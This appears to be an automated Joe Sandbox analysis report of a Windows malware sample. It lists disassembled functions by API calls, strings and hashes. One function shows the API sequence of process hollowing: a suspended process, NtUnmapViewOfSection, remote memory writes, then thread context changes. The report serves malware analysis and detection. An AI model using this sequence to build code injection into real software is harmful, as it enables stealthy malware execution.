Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 09b45999d1ef46437f3cb378a2e2d58202d398a270172ad50f56d847e3edd52a
Instruction ID: a34c8ffd94158fb453ac9e3fc718928ef780047707a3c27eaa6281ec4abdeaba
Opcode Fuzzy Hash: 09b45999d1ef46437f3cb378a2e2d58202d398a270172ad50f56d847e3edd52a
Instruction Fuzzy Hash: 68F0E2326435256FEF3D6A7AACC5BEA3B499F41770B1580A1EE09EB1D4DB30D80082E1

Uniqueness

Uniqueness Score: -1.00%

Function 011BB84A Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,011BEE7B,00000220,?,?,?,?,?,?,011B837B,?), ref: 011BB87C

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ff9ef2df5917ae9033cfe7fa7e5d4ec8e91173f418623c630b9ef39bc2da649e
Instruction ID: e46f3ad511544b18937bbe9783f3c92d40d65cde0fd2154cc78de68541fc7657
Opcode Fuzzy Hash: ff9ef2df5917ae9033cfe7fa7e5d4ec8e91173f418623c630b9ef39bc2da649e
Instruction Fuzzy Hash: 65E09B35249222AFEA3D266EBC84BDB3A4CDF616A5F050134DD5596890DB60C80142EF

Uniqueness

Uniqueness Score: -1.00%

Function 011C0D89 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,011C1179,?,?,00000000,?,011C1179,00000000,0000000C), ref: 011C0DA6

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: cfa85e0ea0158abf9d5feeeac86e8bdf70748e82f8bfb9e120e598953f4cb4dc
Instruction ID: 5a93efc8fb5127578ce6d1b20e01fe4627fdd0b0be7ac60cfc07b78a23d8d7fa
Opcode Fuzzy Hash: cfa85e0ea0158abf9d5feeeac86e8bdf70748e82f8bfb9e120e598953f4cb4dc
Instruction Fuzzy Hash: FED06C3200010DBFDF128E85ED06EDA3FAAFB88714F014010BA1856020C732E861AB90

Uniqueness

Uniqueness Score: -1.00%

Function 011A4B90 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000,011A93BD,?,?), ref: 011A4B99

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1678a9cb8f26fc817caf700ee84929b4de0c9f41ced93d62c1f5b8fe1b46ee17
Instruction ID: 0fc63577ecb407a5ad9f10421c3f66748589fb29897bccee743a2981535ce0b5
Opcode Fuzzy Hash: 1678a9cb8f26fc817caf700ee84929b4de0c9f41ced93d62c1f5b8fe1b46ee17
Instruction Fuzzy Hash: 2CC012380106009BAE1C4A3CA1981553F21A9433A77EC0AA8D6358B8E2C3768447D750

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 011A32A0 Relevance: 30.2, APIs: 14, Strings: 3, Instructions: 421injectionthreadmemoryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 011A3606
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,00000000), ref: 011A366B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,00000000), ref: 011A3684
GetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 011A369F
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000,?,?,00000000), ref: 011A36C3
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,00000000), ref: 011A36DE
GetProcAddress.KERNEL32(00000000), ref: 011A36E5
VirtualAllocEx.KERNEL32(?,?,00000000,00003000,00000040,?,?,00000000), ref: 011A370D
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,00000000), ref: 011A372E
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 011A3772
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,?,00000000), ref: 011A37AE
SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,?,00000000), ref: 011A37CA
ResumeThread.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 011A37D6
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 011A37E4

Strings

, xrefs: 011A36B8
ntdll.dll, xrefs: 011A36D9
NtUnmapViewOfSection, xrefs: 011A36D4

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: Process$Memory$ThreadVirtualWrite$AllocContextModule$AddressCreateFileFreeHandleNameProcReadResume
String ID: $NtUnmapViewOfSection$ntdll.dll
API String ID: 4232606500-1522589568
Opcode ID: 12349e96a4d0eb886528a3c275283369a80a9ac5d64d63c323dc5cc3184666ba
Instruction ID: 990c5f0aecad0432fb90bfbbabbc91650bdb160d39262adba9a7b3d4004afb82
Opcode Fuzzy Hash: 12349e96a4d0eb886528a3c275283369a80a9ac5d64d63c323dc5cc3184666ba
Instruction Fuzzy Hash: 78F1C171A10214AFEF2DCFA8CC85BEDBFB5FF09300F900168E555AA291DB719985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 011C2872 Relevance: 4.7, APIs: 3, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,011D1710), ref: 011C28DC
_free.LIBCMT ref: 011C28CA

Part of subcall function 011BB361: HeapFree.KERNEL32(00000000,00000000,?,011BA493), ref: 011BB377
Part of subcall function 011BB361: GetLastError.KERNEL32(?,?,011BA493), ref: 011BB389

_free.LIBCMT ref: 011C2A96

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 2155170405-0
Opcode ID: eb8527b7b946b785055cc66c2cd5fe018056284dce924d94782eab000182baf5
Instruction ID: 2d286734f13862b1cdb07727d8308229f7f43fc5e5b78c398aee09d211ecc7c5
Opcode Fuzzy Hash: eb8527b7b946b785055cc66c2cd5fe018056284dce924d94782eab000182baf5
Instruction Fuzzy Hash: 15510A71D01216EFDB2CEF799C819EE77B8EF64B54B10016DE561E7280EB309941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 011B9838 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 011B9930
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 011B993A
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 011B9947

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a03906c86604b95174144cbbcd51aeff3d05ca82ca8045eb77cc9db06fda10b1
Instruction ID: 78ea36b5aaa5072a8776c627319798de589f072940c08f84e66fe153b0417785
Opcode Fuzzy Hash: a03906c86604b95174144cbbcd51aeff3d05ca82ca8045eb77cc9db06fda10b1
Instruction Fuzzy Hash: 6631E5B490132D9BCB65DF68D888BCCBBB8BF08314F5041EAE51CA7250E7709B818F44

Uniqueness

Uniqueness Score: -1.00%

Function 011B583B Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 011B5851

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 80147c91b2fed34a365f123eeb1900caba6852ee6f727ef2a6b146ff9ebfde8e
Instruction ID: 80c26734a9d192d0b640bd903a569183f088cf227d243df8ad1b2fee194f8734
Opcode Fuzzy Hash: 80147c91b2fed34a365f123eeb1900caba6852ee6f727ef2a6b146ff9ebfde8e
Instruction Fuzzy Hash: 2F519EB19123058FEB2DCF99D4C13AEBBF1FB48314F18856AD525EB284E3749A40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 011BACC2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ad719187851a61f309ddbb2cee80a5110ae42387cecf94a10a94091515ac20
Instruction ID: fb80c288560dee4038e0d67b8a18747a35ddf2b05a3dbeaf131267a3c5c1083b
Opcode Fuzzy Hash: e0ad719187851a61f309ddbb2cee80a5110ae42387cecf94a10a94091515ac20
Instruction Fuzzy Hash: 20E0EC72921228EBCB29DB9CD98499AF7ECFB49A54B554496F601D3250C374EE00C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 011C0004 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 011C0048

Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFBFE
Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFC10
Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFC22
Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFC34
Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFC46
Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFC58
Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFC6A
Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFC7C
Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFC8E
Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFCA0
Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFCB2
Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFCC4
Part of subcall function 011BFBE1: _free.LIBCMT ref: 011BFCD6

_free.LIBCMT ref: 011C003D

Part of subcall function 011BB361: HeapFree.KERNEL32(00000000,00000000,?,011BA493), ref: 011BB377
Part of subcall function 011BB361: GetLastError.KERNEL32(?,?,011BA493), ref: 011BB389

_free.LIBCMT ref: 011C005F
_free.LIBCMT ref: 011C0074
_free.LIBCMT ref: 011C007F
_free.LIBCMT ref: 011C00A1
_free.LIBCMT ref: 011C00B4
_free.LIBCMT ref: 011C00C2
_free.LIBCMT ref: 011C00CD
_free.LIBCMT ref: 011C0105
_free.LIBCMT ref: 011C010C
_free.LIBCMT ref: 011C0129
_free.LIBCMT ref: 011C0141

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 3b20acb0960c5b7ac12bc6a3dfbb9ee0ecafd3a3268465fb0076fb8787f2899e
Instruction ID: 4219316a3d74faa99356323962529b1c8ffe99703f488dfd636e1cef3e2c51e8
Opcode Fuzzy Hash: 3b20acb0960c5b7ac12bc6a3dfbb9ee0ecafd3a3268465fb0076fb8787f2899e
Instruction Fuzzy Hash: ED318F35508A02DFEB296A7DD880B9AB7E8FF64B54F11441DF545D71A1DF30E890CB14

Uniqueness

Uniqueness Score: -1.00%

Function 011BBB3A Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 011BBB50

Part of subcall function 011BB361: HeapFree.KERNEL32(00000000,00000000,?,011BA493), ref: 011BB377
Part of subcall function 011BB361: GetLastError.KERNEL32(?,?,011BA493), ref: 011BB389

_free.LIBCMT ref: 011BBB5C
_free.LIBCMT ref: 011BBB67
_free.LIBCMT ref: 011BBB72
_free.LIBCMT ref: 011BBB7D
_free.LIBCMT ref: 011BBB88
_free.LIBCMT ref: 011BBB93
_free.LIBCMT ref: 011BBB9E
_free.LIBCMT ref: 011BBBA9
_free.LIBCMT ref: 011BBBB7

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d0abc89296271f96f77c1a3cf2645a3f844d323742ebaabbc4f92f51ba6ce783
Instruction ID: 0a0df83c952f116debd4718428832bc70865116eaf8826dcdbf8fab7d8999d57
Opcode Fuzzy Hash: d0abc89296271f96f77c1a3cf2645a3f844d323742ebaabbc4f92f51ba6ce783
Instruction Fuzzy Hash: 0A21B776908109AFCB05EF95C880DDE7BB9FF18744F0051A6FA169B530EB31EA44CB84

Uniqueness

Uniqueness Score: -1.00%

Function 011C59B2 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8ec7ac0b9c66b95d98667054604c4409961d7fd56c73da62ea96db1dde0d4f
Instruction ID: d4d0a4bf530ca13e9ef7837102c25847accd99ada7fb0eabae49dad058cac831
Opcode Fuzzy Hash: 3c8ec7ac0b9c66b95d98667054604c4409961d7fd56c73da62ea96db1dde0d4f
Instruction Fuzzy Hash: 82C12570B04346AFDB1DDF9CD880BADBBB6AF29B14F00459CE91197291C330A982CF65

Uniqueness

Uniqueness Score: -1.00%

Function 011B5D40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 011B5D77
___except_validate_context_record.LIBVCRUNTIME ref: 011B5D7F
_ValidateLocalCookies.LIBCMT ref: 011B5E08
__IsNonwritableInCurrentImage.LIBCMT ref: 011B5E33
_ValidateLocalCookies.LIBCMT ref: 011B5E88

Strings

csm, xrefs: 011B5EB1
csm, xrefs: 011B5E1D

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 1170836740-3733052814
Opcode ID: 36926edf21d80a6be5eeebf4d55b2da766753dc1fad5b4f1d945e011d68b3ac7
Instruction ID: 9441142450ac8a963279cc8e8088d5c0e6a9728c4a34a8e175e3e260580b637e
Opcode Fuzzy Hash: 36926edf21d80a6be5eeebf4d55b2da766753dc1fad5b4f1d945e011d68b3ac7
Instruction Fuzzy Hash: 0151F270A00215DFCF6CDF6CC8C4AEEBFB2AF54228F148169E8155B2A1D731DA02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 011BF41C Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 011BF446
_free.LIBCMT ref: 011BF51F
_free.LIBCMT ref: 011BF54C

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: d11c68d5df30549759d1a4d528c2ea696a4059fbce6487270751df0dbb172a76
Instruction ID: 2d34af9565d740ae4d6790e76ff92ee8bfc4f3be01953524d0c9f1a96edd4367
Opcode Fuzzy Hash: d11c68d5df30549759d1a4d528c2ea696a4059fbce6487270751df0dbb172a76
Instruction Fuzzy Hash: DD51E671909207AFEB2DAF7C9CC0AED7BA4EF11728F0041A9EA11D7291EB358543CB51

Uniqueness

Uniqueness Score: -1.00%

Function 011BBF0C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 011BBF63
ext-ms-, xrefs: 011BBF77

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: dc258b7274911bc429c729d314e188f3e3186b69d767bf63e0ef6d713900f82d
Instruction ID: 7d526a97cf4f11487ed47a4c6d7ef0cb143a0da95b7af316a894c87c82d30d0c
Opcode Fuzzy Hash: dc258b7274911bc429c729d314e188f3e3186b69d767bf63e0ef6d713900f82d
Instruction Fuzzy Hash: 3F212B71A0D221AFDB3E4AA89CC0A9A7B589F417A0F12053CED15A7681D731ED008FE7

Uniqueness

Uniqueness Score: -1.00%

Function 011BFD80 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 011BFD48: _free.LIBCMT ref: 011BFD6D

_free.LIBCMT ref: 011BFDCE

Part of subcall function 011BB361: HeapFree.KERNEL32(00000000,00000000,?,011BA493), ref: 011BB377
Part of subcall function 011BB361: GetLastError.KERNEL32(?,?,011BA493), ref: 011BB389

_free.LIBCMT ref: 011BFDD9
_free.LIBCMT ref: 011BFDE4
_free.LIBCMT ref: 011BFE38
_free.LIBCMT ref: 011BFE43
_free.LIBCMT ref: 011BFE4E
_free.LIBCMT ref: 011BFE59

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 89e8bd580dadc0ca0831b6cc32d56457bf2851fca634395e219d98d1c19114df
Instruction ID: 4f444101c0a44d26e1ef560171879c12d5d713f07e77d2df1f51d55e039f2824
Opcode Fuzzy Hash: 89e8bd580dadc0ca0831b6cc32d56457bf2851fca634395e219d98d1c19114df
Instruction Fuzzy Hash: 90116071649F06BADA24BBB1CCC5FCF779CAF20744F400C15F6AAAA060DB75B5069750

Uniqueness

Uniqueness Score: -1.00%

Function 011C1519 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,011A4B80,00000000), ref: 011C1561
__fassign.LIBCMT ref: 011C1740
__fassign.LIBCMT ref: 011C175D
WriteFile.KERNEL32(?,011A4B80,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011C17A5
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 011C17E5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 011C1891

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 32a6fb6b523e1d0e9e0422c44765916655fb982db52e86b5b23fbf062d31281c
Instruction ID: 6da1fe399371628a35207eda951e96f61c5cafffc27d79ee94cfa65cff2b1019
Opcode Fuzzy Hash: 32a6fb6b523e1d0e9e0422c44765916655fb982db52e86b5b23fbf062d31281c
Instruction Fuzzy Hash: 62D1BB71D05258EFCF19CFA8C8809EDBBB5BF59714F28416EE815BB242D730A946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 011B6144 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,011B613B,011B5FA9,011B5803), ref: 011B6152
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 011B6160
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 011B6179
SetLastError.KERNEL32(00000000,011B613B,011B5FA9,011B5803), ref: 011B61CB

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8275b8a4706be798be71a044681e2ead031687a89998113fde28333f61ba7d0c
Instruction ID: 027301531236755368d593047631b330b890201866a324a80613b23a728b817f
